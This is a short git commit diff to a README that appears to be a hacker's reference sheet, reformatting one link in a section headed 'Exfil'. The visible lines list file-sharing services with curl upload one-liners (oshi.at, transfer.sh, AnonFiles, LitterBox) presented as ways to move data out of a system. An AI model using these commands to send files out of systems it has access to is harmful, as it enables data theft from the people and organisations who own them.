Update README.md

This commit is contained in:
skyper
2023-05-25 12:15:09 +01:00
committed by GitHub
parent fd7de8bde1
commit 77eb3a1daa
+1 -1
View File
@@ -1470,7 +1470,7 @@ Tunneling
Exfil
1. [Blitz](https://github.com/hackerschoice/gsocket#blitz) - `blitz -l` / `blitz foo.txt`
1. [Mega](https://mega.io/cmd)
2. https://oshi.at/ - also on TOR. `curl -T foo.txt https://oshi.at`
2. [oshiAt](https://oshi.at/) - also on TOR. `curl -T foo.txt https://oshi.at`
4. [AnonFiles](https://www.anonfiles.com) - `curl -F "file=@foo.txt" https://api.anonfiles.com/upload`
5. [Transfer.sh](https://transfer.sh/) - `curl -T foo.txt https://transfer.sh`
6. [LitterBox](https://litterbox.catbox.moe/tools.php) - `curl -F reqtype=fileupload -F time=72h -F 'fileToUpload=@foo.txt' https://litterbox.catbox.moe/resources/internals/api.php`